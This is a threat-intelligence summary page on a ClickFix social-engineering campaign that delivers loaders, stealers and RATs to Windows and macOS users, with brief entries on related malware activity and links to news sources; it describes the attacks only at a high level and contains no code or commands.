ClickFix multi-loader delivery campaign targeting Windows and macOS users
Campaign
Summary
Hide ▲
Show ▼
The ClickFix malware-delivery campaign is spreading BabaDeda Loader, Lorem Ipsum Loader, and Potemkin, widening risk for Windows and macOS users across several sectors. The operation uses social engineering, compromised WordPress sites, and fake update lures to trick victims into running attacker-controlled commands. Those chains can drop information stealers and RATs, creating paths to credential theft and remote access. The activity shows a sustained shift in delivery methods as operators adapt to disruptions and keep the campaign moving.
Related Happenings
Potemkin loader delivering EtherRAT and RMMProject in memory
Malware Activity
H score29
First: 16.06.2026 20:41
Last: 16.06.2026 20:41
Sources 1
How related:
"Potemkin loader is a \"custom x64 loader that uses a domain generation algorithm to find its C2 and reflectively loads follow-on modules in memory,\" Huntress researchers Anna Pham and Zach Rogers said.
About this happening:
The **Potemkin** loader is delivering **EtherRAT** and **RMMProject** to **Windows** systems, giving operators in-memory payload execution and **browser credential theft**. The lo...
Potemkin loader delivering EtherRAT and RMMProject in memory
Malware ActivityHow related: "Potemkin loader is a \"custom x64 loader that uses a domain generation algorithm to find its C2 and reflectively loads follow-on modules in memory,\" Huntress researchers Anna Pham and Zach Rogers said.
About this happening: The **Potemkin** loader is delivering **EtherRAT** and **RMMProject** to **Windows** systems, giving operators in-memory payload execution and **browser credential theft**. The lo...
Atlas RAT and related loaders deployed for remote access and credential theft
Malware Activity
H score33
First: 04.06.2026 00:45
Last: 04.06.2026 00:45
Sources 1
About this happening:
**TA4922**, a **China-linked** and likely **financially motivated** malware activity, has expanded beyond **East Asia** into **Europe** and **Africa**. The group uses **Atlas RAT*...
Atlas RAT and related loaders deployed for remote access and credential theft
Malware ActivityAbout this happening: **TA4922**, a **China-linked** and likely **financially motivated** malware activity, has expanded beyond **East Asia** into **Europe** and **Africa**. The group uses **Atlas RAT*...
Google DoubleClick malspam campaign delivering DesckVB RAT
Campaign
H score33
First: 03.06.2026 19:29
Last: 03.06.2026 19:29
Sources 1
About this happening:
A **new malspam campaign** is abusing **Google's DoubleClick** redirect path to evade detection and deliver **DesckVB RAT**, putting users and organizations at risk of malware inf...
Google DoubleClick malspam campaign delivering DesckVB RAT
CampaignAbout this happening: A **new malspam campaign** is abusing **Google's DoubleClick** redirect path to evade detection and deliver **DesckVB RAT**, putting users and organizations at risk of malware inf...
Vidar Stealer ClickFix campaign targeting multiple sectors
Campaign
H score38
First: 08.05.2026 14:00
Last: 08.05.2026 14:00
Sources 1
About this happening:
The **Vidar Stealer** campaign is using **ClickFix** social engineering and compromised **WordPress** sites to deliver password-stealing malware, widening risk for **infrastructur...
Vidar Stealer ClickFix campaign targeting multiple sectors
CampaignAbout this happening: The **Vidar Stealer** campaign is using **ClickFix** social engineering and compromised **WordPress** sites to deliver password-stealing malware, widening risk for **infrastructur...
Venom Stealer MaaS continuous credential theft and exfiltration
Malware Activity
H score21
First: 01.04.2026 16:30
Last: 01.04.2026 16:30
Sources 1
About this happening:
The **Venom Stealer** **malware-as-a-service** platform has been identified as a **credential-theft** threat that keeps exfiltrating data after infection, extending the window for...
Venom Stealer MaaS continuous credential theft and exfiltration
Malware ActivityAbout this happening: The **Venom Stealer** **malware-as-a-service** platform has been identified as a **credential-theft** threat that keeps exfiltrating data after infection, extending the window for...
Timeline
-
16.06.2026 20:41 2 articles · 6h ago
ClickFix multi-loader delivery campaign targeting Windows and macOS users
Initial DisclosureIn **April 2026**, a **ClickFix** delivery chain used **PowerShell** social engineering to install **BabaDeda Loader** and stage stealers plus **RATs**. The initial loader framework emphasized stealth and payload flexibility rather than a single fixed payload.
Show sources
- ClickFix Campaigns Expand Malware Delivery With New Loaders and Fake Update Lures — thehackernews.com — 16.06.2026 20:41
- ClickFix Campaigns Expand Malware Delivery With New Loaders and Fake Update Lures — thehackernews.com — 16.06.2026 20:41